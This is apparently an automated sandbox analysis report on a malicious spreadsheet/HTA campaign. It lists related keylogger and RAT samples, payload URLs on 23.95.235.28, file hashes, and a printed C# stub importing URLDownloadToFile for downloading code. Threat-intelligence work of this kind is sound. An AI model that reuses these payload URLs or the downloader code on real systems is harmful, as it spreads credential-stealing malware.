                                                                                    Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 23.95.235.28/xampp/rsc/uhg.hta
                                                                                    Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
                                                                                    Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
                                                                                    Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
                                                                                    kissingwithbestexperiencedgirlfriendonhereformenice.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                    • 23.95.235.28/560/vcc.exe
                                                                                    niceskillbestexperiencegivenmegood.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                    • 23.95.235.28/550/vcc.exe
                                                                                    Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 23.95.235.28/xampp/vn/v/kissingwithbestexperiencedgirlfriendonhereformenice.hta
                                                                                    158.101.44.2424500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    #rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    niceworkingskillwithbestideasevermade.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    rDatosbancarios.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Yl5gNdZgTd.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • checkip.dyndns.org/

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    checkip.dyndns.comYeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                    • 193.122.6.168
                                                                                    PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    reallyfreegeoip.orgYeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.48.1
                                                                                    QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                    • 104.21.16.1
                                                                                    PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.96.1
                                                                                    1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.96.1

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUShttps://westmaidentrue.click/mirage/magestiqueGet hashmaliciousRedLineBrowse
                                                                                    • 1.1.1.1
                                                                                    load.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.141.133
                                                                                    Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.13.205
                                                                                    Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.12.205
                                                                                    Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.13.205
                                                                                    https://briefingmeetup.deGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 104.21.112.1
                                                                                    http://bigdataframes.siteGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    remittance detail_03.12.2025_RECIPIENT_DOMAIN_NAME}00990__098.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.17.6
                                                                                    SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 188.114.97.3
                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 188.114.97.3
                                                                                    AS-COLOCROSSINGUSsigned contract 01.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 198.12.89.24
                                                                                    PAYMENT ADVICE.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 172.245.123.28
                                                                                    Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 172.245.123.24
                                                                                    Document.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 107.174.231.211
                                                                                    HAWKE ORDER 12.3.2025.pdf (#U007e135 KB).xlsGet hashmaliciousUnknownBrowse
                                                                                    • 104.168.7.38
                                                                                    signed contract 01.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 198.12.89.24
                                                                                    Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 104.168.7.38
                                                                                    PAYMENT ADVICE.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 172.245.123.28
                                                                                    Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 172.245.123.24
                                                                                    HAWKE ORDER 12.3.2025.pdf (#U007e135 KB).xlsGet hashmaliciousUnknownBrowse
                                                                                    • 104.168.7.38
                                                                                    ORACLE-BMC-31898USYeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                    • 193.122.6.168
                                                                                    Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    cbr.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                    • 144.25.156.103
                                                                                    file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    http://account.hrblock.comGet hashmaliciousUnknownBrowse
                                                                                    • 130.61.120.2

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    54328bd36c14bd82ddaa0c04b25ed9adYeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.80.1

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):962048
                                                                                    Entropy (8bit):6.8404672126338975
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Eu6JWgXT7rKfXNeKgOIc0nAWY/ySWHDVz/Vovh7V1C0NnCGso9fgBDYga9TRmJTT:Eu6J33O0c+JY5UZ+XC0kGso6Fa5tCWY
                                                                                    MD5:724A10F0D502447504BD44AD72AA462F
                                                                                    SHA1:967CE5451BC887068A8ABFBA6CCBEDA97E452DEA
                                                                                    SHA-256:AFC0FAE5423AFEAB434D2F262D8C658D2F316C50986BFE2777E09B90D50A1971
                                                                                    SHA-512:D76FEC804B7D1BDEC53F533AB46B3A1A958F8962D98AF8A869366615429F46767558B3A7E5228A8A909FF6F682EEC42144F68A41F96108DF70A4692E311E074B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...OP.g.........."..................}............@.......................... ......@.....@...@.......@.....................L...|....p...%.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....%...p...&..................@..@.reloc...q.......r...<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1328
                                                                                    Entropy (8bit):5.401282491603541
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3KIWSKco4KmM6GjKbmOIKo+mZ9tYs4RPQoUEJ0gt/NK3R8UHrgtq:pWSU4Yymp+mZ9tz4RIoUl8NWR8WP
                                                                                    MD5:22126327B16A6B21F6183FC5D7C4BC40
                                                                                    SHA1:0794FA6ECCC3372BEA622B2B471D4EECD34FC302
                                                                                    SHA-256:0946CD8DD4C15F347CBAB1B1202B9F4FCABEE49B3A1C76A64C9FF2BF40FA4E72
                                                                                    SHA-512:4FCA7DEE99ADA06663464F0DC0647712B1D5AB714566E6C5FDF74BEE344FA53EAE4C10185D0A5C951001612699192368B44E9DA08B963E88CD11F768CE367191
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                    C:\Users\user\AppData\Local\Temp\RESC24D.tmp

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Thu Mar 13 01:24:09 2025, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1340
                                                                                    Entropy (8bit):3.982321318079384
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HtK9oca+Mh5aH4wKcjmfwI+ycuZhNnWakSEHPNnqSed:pZ5ynK2mo1ulWa3CqS+
                                                                                    MD5:615497C577EEE858B703F41E08890D45
                                                                                    SHA1:CB1D41E00A4920A7A9F0196A180B1583264AD50C
                                                                                    SHA-256:309A116B8EEC01BC5A777C9AA56BE4B08E38FE245F1AFFE8E5955CF4B21B98F6
                                                                                    SHA-512:5DAE38C727C66AB57174D4C78A25565904D21C7D3B65F531D71F375CAEA47C22DF077E1B8902B7DB5C4870DF9D1977EC235C24D062C2EA2166F4691A2CDEF530
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:L....3.g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP..................Gn.`.erD..J...x..........7.......C:\Users\user\AppData\Local\Temp\RESC24D.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.b.m.n.g.f.j.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0txu0crz.jki.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4vtcq1d.qnk.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eo40twkl.1zn.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kx1t5jwa.gki.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\autD6CF.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\csso.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):60794
                                                                                    Entropy (8bit):7.901896315298872
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:v/w2nM/a4pct9zNDc8tu21JBypiIF9JVV0yzD3RAte6:v/w2nAON1HkpkcTete6
                                                                                    MD5:D43BC7160BC6DA54AFE896EADC54DAB6
                                                                                    SHA1:505C09B9B514510A6CAD97ABEA14440F1FEF21E2
                                                                                    SHA-256:D69D48C1555C80E1D949563F0687B70B3ED4EE03EC347A822B916DF85C664140
                                                                                    SHA-512:480F007943129F047A24E2AE6E52D0C142446B887AA907ECF22D73F74E79044ADE4EE6819CD63E724A3809D67E8923DB8CAB5702F6329C3373145A215A0EB951
                                                                                    Malicious:false
                                                                                    Preview:EA06..n.....:uNgS..fSM..gM...s.......j`.y....}0..o-.R..z&z%.]..X...>...5j...(.T%......Tl.J4..Z..o..=.W\.....,.....s2.Q(.<.....X..gQ.L.vJ-..L...`.....S:.d.,.....Ns...(.:m\.?4...u(.i.<./.j,.mM...s.H..#.......7l`..br...]X.....*s...../.]..Z..X.....(.]..,.U....N.8.M(.....gS....y...X......aK.!+....F..o...V.Q.Qi@..Np...r.....y.......8...`..Fs<.R1ti.g.3......q..T.8....uO.R...,.....b.Q.U............,.........,W...!...BK@.J..a?.,+..........p..p.XKj1.4.iO.Ei....s9.M-.....3..@D...#M..zs...a6....Bs9.Q.4i...7..g.....9.....iF.I@R.EZ...Q..:4.9.F"TZ$n...Nbq@..L.B..s).....F`..$.iC.\@..<........l.#q.Qi..|.@..Ff..%6.S...S..ZwS.!#.8.n."...j.f.G..R.......i{...m0.L.u9.G*..F.9.Vs..M't..rc<..fS....M...s...9...c>....4....l....N....6.A..SoH.....?Ko..,..~s...F..ow..*.......im...Y....nQm..mNkS...B..N.1....J-.a0......&.F..o6Z....y#r..R?;...R.m..0...1.........@.'[,..e..DD...`.'sS.....-.cO.S..2..w...).`...;..js{..M9....K....,G2.7.......bUM..m@.d..{...3=...7..fu........s..........u.. ..

                                                                                    C:\Users\user\AppData\Local\Temp\caprone

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\csso.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):93696
                                                                                    Entropy (8bit):6.663634817949847
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:/Zu5NbhBFNzGG6lte40mKT6WfRKHWWxaxVWr7pUITXQq:/QWHlIfUaQ2WxaxVWr7pUIjQq
                                                                                    MD5:A6E50B8443D10E4BA1213CBB3D521966
                                                                                    SHA1:3F23471199D78BC01C8700F0A77771F9885D2F7C
                                                                                    SHA-256:B01FAA6339DDEA2C05F21BB96B668C90A8D3A5579EE4900622D8474E9F44C097
                                                                                    SHA-512:DFBA52A4FB61CAA7DF907DB30260EC6F5A6F24444F9A27899D0D56AB860F3F1EE614BE57CFEED96E9CFB0DBFCA03181C867FF485FF6E6DF5922E549D52148F7F
                                                                                    Malicious:false
                                                                                    Preview:y..3NS3S=924..3M.3S9924E.3MS3S9924EF3MS3S9924EF3MS3S9924EF3M.3S97-.KF.D...8u....Z>sC!V^@U(fP,=]<M.PQe4F#sZ=.}}ge+\)6.^43.4EF3MS3.|92xDE3.={.9924EF3M.3Q823dEFWLS3[9924EF..R3S.924.G3MSsS9.24ED3MW3S9924E@3MS3S992.DF3OS3S9926E&.MS#S9)24EF#MS#S9924EV3MS3S9924EFc.R3.9924.G3.V3S9924EF3MS3S9924EF.LS?S9924EF3MS3S9924EF3MS3S9924EF3MS3S9924EF3MS3S9924EF3mS3[9924EF3MS3S1.24.F3MS3S9924EhG(+GS99.VDF3mS3S]824GF3MS3S9924EF3Ms3SY.@G7%3MS.V992.DF3KS3S_824EF3MS3S9924.F3.}A6UVQ4EJ3MS3.8926EF3!R3S9924EF3MS3Sy92vEF3MS3S9924EF3MS..8924EF{MS3Q9<2H.F3..3S:924.F3K..S9.24EF3MS3S9924EF3MS3S9924EF3MS3S9924EF3MS3S9.O.J..:@..924EF3LQ0W?1:4EF3MS3SG924.F3M.3S9.24Ec3MS^S99.4EFMMS3-992PEF3?S3SX924.F3M<3S9W24E83MS-Q.&24Ol.MQ.s9984o.@lS3Y.824A5.MS9.;9206e3MY.P996GaF3G.7S9=A.EF9.V3S=.h4F.%KS3HV.24OF0.F5S9"..ED.tS3Y9..4F.&KS3H..26.O3MW..J$24CnqMS9'0926.L3MW.M;.q4EL.o- S9=.4odMYS3W.9..;S3MW.S..L"EF7fS.qG.24Am3gU.19K.8E60"23S?..4EL..S3U9..4;H3MW1<.92>cl.M{cS9?2..F3KS..9G.4EB.J-.S9=.";w3MW.UA9226.3MY...920m.3MY3y.9.mEF5M{.S9?

                                                                                    C:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):652
                                                                                    Entropy (8bit):3.099778539615212
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Wak7YnqqEHPN5Dlq5J:+RI+ycuZhNnWakSEHPNnqX
                                                                                    MD5:CE476EE1607F65724496FD4ADF0FF878
                                                                                    SHA1:7813137C4EB25EA9DA7873A570829E51CA20C2DE
                                                                                    SHA-256:42679FCED8E5E5F7044DE299193F77BE8400EEB022CF29FCCA578D6746AA1097
                                                                                    SHA-512:A1FC06808A86295F9DC79D7AA5B6040294C8C7D7E3EEB36E787FAB8A27EB043A7FC604EE19767628D6415172FCC99AA22BA58BC661DF21EAF095B1D642949E52
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.b.m.n.g.f.j.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.b.m.n.g.f.j.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                    C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.0.cs

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (350)
                                                                                    Category:dropped
                                                                                    Size (bytes):467
                                                                                    Entropy (8bit):3.609505187971277
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:V/DsYLDS81zu6Tlim/dHMGl/JjQXReKJ8SRHy4HFQmIh4sNgT3Ky:V/DTLDfu6TYIdFuXfHSTsKy
                                                                                    MD5:8E152222B8DDBD0A2979CB23ACB1742F
                                                                                    SHA1:AB57F25DDE03B79E9079219A4C08EAF3BC22FB0D
                                                                                    SHA-256:A86D009A189A71E1F11D4E9D37F02FEB9661F0F887049092F9CB48025A8B6187
                                                                                    SHA-512:443D306E57BD14963B106B2FD187FE6E5BF763078B8B79EA473630D25A384B293E351DC92C2477C49CB5A48956564EA5CDECDEDBA105912018AD086B4151F8E1
                                                                                    Malicious:false
                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace edv.{. public class HuwJrMudHL. {. [DllImport("urLmon.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr G,string JwFF,string Dyp,uint X,IntPtr zJ);.. }..}.

                                                                                    C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):375
                                                                                    Entropy (8bit):5.241916829405215
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fGLzzxs7+AEszIN723fGLNAn:p37Lvkmb6K2asWZETaJ
                                                                                    MD5:EDBEDC60243B7204731F06C4A7AD2148
